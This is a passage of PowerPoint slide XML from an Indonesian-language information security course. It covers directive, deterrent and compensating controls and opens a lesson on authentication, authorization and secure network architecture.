            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disipliner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemecatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pencegah-pengendalian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>psikologis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukuman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kompensasi-kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direkomendasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metodologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17493046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PENGANTAR PELAJARAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanyalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor-faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembelajaran</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal-hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
